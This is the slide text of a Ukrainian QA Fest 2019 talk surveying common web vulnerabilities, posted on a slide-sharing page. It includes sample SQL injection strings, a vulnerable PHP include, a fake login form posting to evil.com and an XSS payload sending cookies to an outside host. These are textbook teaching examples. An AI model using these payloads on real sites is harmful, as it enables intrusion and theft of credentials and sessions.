QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
Report
Share
•0 likes•979 views
![FILE INCLUSION
<?php
$file = $_GET[«file»];
include(“/var/www/backend/$file”);
?>
https://example.com/?page=contact.php](https://image.slidesharecdn.com/qafest-191004081627/75/qa-fest-2019-40-13-2048.jpg?cb=1668674897)
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
•0 likes•979 views
Report
Share
Поговоримо про найпопулярніші помилки, яких припускаються розробники веб додатків, та як зловмисник може використати їх на свою користь. Охопимо максимальну кількість матеріалу за короткий проміжок часу.
Recommended
More Related Content
Similar to QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
Similar to QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин(20)
More from QAFest
More from QAFest(20)
Recently uploaded
Recently uploaded(20)
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
- 1. KYIV 2019 Короленко Сергій Всі вразливості у веб додатках
- 3. Bugcrowd’s Vulnerability Rating Taxonomy
- 4. RCE Remote Code Execution | Code injection
- 5. RCE Remote Code Execution | Code injection
- 10. SQL Injection
- 11. Stacked queries UNION query-based Error-based Boolean-based blind Time-based blind 1 AND (ascii(substr((SELECT version()),1,1))) > 52— 1 AND IF((SELECT ascii(substr(version(),1,1))) > 53,sleep(10),NULL)— 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(version(),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- 1 UNION ALL SELECT NULL,version()-- 1; SELECT version()-- SQL Injection
- 12. XXE |XML external entity injection
- 13. FILE INCLUSION <?php $file = $_GET[«file»]; include(“/var/www/backend/$file”); ?> https://example.com/?page=contact.php
- 18. CRLF injection (CRLF, rn, %0A%0D)
- 19. HTML Injection Hi! My name is <h1>hacker</h1> Hello HACKER Hi! My name is <h1>Log in to view a content</h1> <form action="http://evil.com"> Username: <input name="username"><br> Password: <input name="password"><br> <input type="submit"> </form>
- 20. XSS | Cross Site Scripting
- 22. XSS | Cross Site Scripting www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
- 24. http://bank.com/transfer?amount=50.0&from=4165**02&to=7893-1892-2940-4280 http://bank.com/transfer?amount=50.0&from=4165**02&to=4153-1802-9420-4483 CSRF | Cross-Site Request Forgery
- 25. CSRF | Cross-Site Request Forgery
- 26. SSRF| Server Side Request Forgery http://example.com/?url=http://localhost/server-status
- 30. Weak password reset question/answer
- 31. Weak password change/reset http://bank.com/reset_password?email=ololo@example.com&token=1561324612 http://bank.com/reset_password?email=ololo@example.com&token=1561324754 http://bank.com/reset_password?email=ololo@example.com&token=1561324698 MD5 ("ololo@example.com") = 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/reset_password?email=ololo@example.com&token= 83fa8dbfe2725ff513c4028a7f60df36 http://bank.com/reset_password?email=ololo@example.com&token= 83fa8dbfe2725ff513c4028a7f60df36
- 32. Bypass 2FA
- 34. Broken Access Control http://bank.com/admin/reset_password?user=ololo@example.com&newpass=3.1415pec!
- 36. Session Fixation
- 37. Password API Keys /.git/ Sensitive Data Exposure
- 38. Directory Listing DirSearch (backups, logs, etc.)
- 40. Privileged user: uid=0(root) No Rate Limits CAPTCHA Bypass
- 41. Security Headers •Server headers that protect against attacks ◦HTTP Strict Transport Security ◦Content Security Policy ◦Access-Control-Allow-Origin ◦X-FrameOptions ◦X-XSS-Protection ◦X-Content-Type-Options •Server headers that leak information ◦Server ◦X-Powered-By ◦X-AspNet-Version
- 42. Detailed Error